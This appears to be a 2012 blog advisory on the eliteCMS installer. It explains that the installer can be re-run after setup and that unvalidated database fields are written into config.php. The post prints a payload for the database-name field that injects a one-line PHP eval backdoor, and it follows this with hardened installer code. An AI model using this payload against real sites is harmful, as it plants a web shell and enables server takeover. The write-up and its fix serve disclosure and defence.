
龙少'Blog

 

 
 
 


 
 

eliteCMS: unverified installer + one-line backdoor write vulnerability

2012-11-17 13:06:32 | Category: Default category

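The eliteCMS installer is not locked once installation has finished, so hackers can run the installation again simply by visiting the installer's URL.
The other vulnerability is that the installer can write a one-line backdoor directly into admin/includes/config.php.
Let's look at the code: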

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];


The values are taken from the request without any validation.
If the following is POSTed as the database name:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor will be written into /admin/includes/config.php
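
A hardened version of the two steps shown above, as an added example that is not eliteCMS code: the installer refuses to run when a lock file exists, and the database settings are allow-list validated and emitted with var_export() so they cannot break out of the string literal. The function names, the install.lock path and the validation patterns are assumptions made for illustration.

```php
<?php
const INSTALL_LOCK = __DIR__ . '/install.lock'; // hypothetical lock-file path (assumption)

// Refuse to run any install step once a previous installation has completed.
function assert_not_installed(string $lock = INSTALL_LOCK): void
{
    if (file_exists($lock)) {
        http_response_code(403);
        exit('Already installed. Remove the install directory.');
    }
}

// Allow-list validation; the D modifier stops "$" matching before a trailing newline.
function validate_db_settings(array $in): array
{
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/D',
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/D',
        'DB_USER'   => '/^[A-Za-z0-9_]{1,32}$/D',
    ];
    $out = [];
    foreach ($rules as $key => $re) {
        $val = $in[$key] ?? '';
        if (!is_string($val) || !preg_match($re, $val)) {
            throw new InvalidArgumentException("Invalid value for $key");
        }
        $out[$key] = $val;
    }
    // Passwords may hold any character; var_export() below keeps them inside a literal.
    $out['DB_PASS'] = is_string($in['DB_PASS'] ?? null) ? $in['DB_PASS'] : '';
    return $out;
}

// Build config.php so every value is written as an escaped PHP string literal.
function render_config(array $cfg): string
{
    $src = "<?php\n";
    foreach ($cfg as $key => $val) {
        $src .= 'define(' . var_export($key, true) . ', ' . var_export($val, true) . ");\n";
    }
    return $src;
}

// Constructed sample input: the DB_NAME value from the post is rejected.
$post = ['DB_SERVER' => 'localhost', 'DB_NAME' => '"?><?php eval($_POST[c]);?><?php',
         'DB_USER' => 'cms', 'DB_PASS' => 'p"a\'ss'];
try { validate_db_settings($post); } catch (InvalidArgumentException $e) { echo $e->getMessage(), "\n"; }
$post['DB_NAME'] = 'elitecms';
echo render_config(validate_db_settings($post));
```

In an installer, assert_not_installed() would be called at the top of every step and the lock file created after the final step succeeds; removing the install directory afterwards remains the stronger control.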
